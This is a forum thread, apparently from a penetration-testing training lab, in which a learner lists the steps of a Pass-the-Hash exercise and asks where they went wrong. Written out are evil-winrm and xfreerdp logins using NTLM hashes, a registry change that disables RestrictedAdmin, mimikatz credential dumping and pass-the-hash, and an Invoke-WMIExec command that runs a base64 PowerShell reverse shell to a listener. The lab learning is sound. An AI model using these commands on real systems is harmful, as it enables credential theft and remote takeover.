Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01)

Hello all

As many people have said, some tasks seem to be particularly difficult which can be very frustrating, although giving the opportunity to hone micro techniques (being what I keep in mind to provide motivation), this question has got the better of me for too long now.

I will provide a sequence of methods, commands and outcomes undertaken and can someone pleasee let me know where I’m going wrong here . I feel as though I’m completing everything correctly but still cant manage to catch a shell.

1. Firstly, Im using evil-winrm to change the restricted admin mode with the following commands:

evil-winrm -i 10.129.204.23 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

2. Next, I’m using xfreerdp to RDP to the machine using the following command:

xfreerdp /v:10.129.204.23 /u:Administrator /pth:30B3783CE2ABF1AF70F77D0660CF3453

3. Following this, I’m dumping NTLM hashes using mimikatz and with the following commands:

privilege::debug

sekurlsa::logonPasswords full

4. This gives me the NTLM hashes for 4 user accounts (I wont provide the hashes here to avoid spoilers):

MS01
julio
david
john

5. Next, I RDP using julios creds as per the question.

6. From which I try to initiate a pass the hash (PTH) using mimikatz and with MS01 creds (this is to enable the lister with MS01 as the user as the question states that the machine will only connect back to MS01). This executes with no errors, however when whoami is passed, the user printed is still julio (to try and mitigate error I tried the same process when RDPing using admin creds which allowed me to PTH into MS01). This was done using the following command:

mimikatz.exe privilege::debug “sekurlsa::pth /user:MS01 /rc4:27306e8dad558c047eb35761abb16fc1 /domain:inlanefreight.htb /run:cmd.exe” exit

7. A nc listner is configured to listen on any 8001.

8. Finally, using powershell the following commands are executed to catch the shell (the following socket was configured in powershell3 base64 rev shell gen - 127.16.1.5:8001):

Import-Module .\Invoke-TheHash.psd1

Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command “powershell -e ‘’‘base64 here’‘’”

Note: all instances of cmd and ps are run as admin.

I have tried this sequence various times, on my local machine and with the pwnbox and I just cant get it to work. I’m thinking my error lies in step 6 where I cant PTH to MS01.

Thanks for taking the time to read and all help appreciated

I’m not sure, pretty stuck on the part as well. Last question and it sucks, Ill try once more.

Make sure to generate your own shell using https://www.revshells.com/ . I couldn’t get it to work with the shell provided in their notes, even though the IP and ports used were identical. I generated my own and came right up.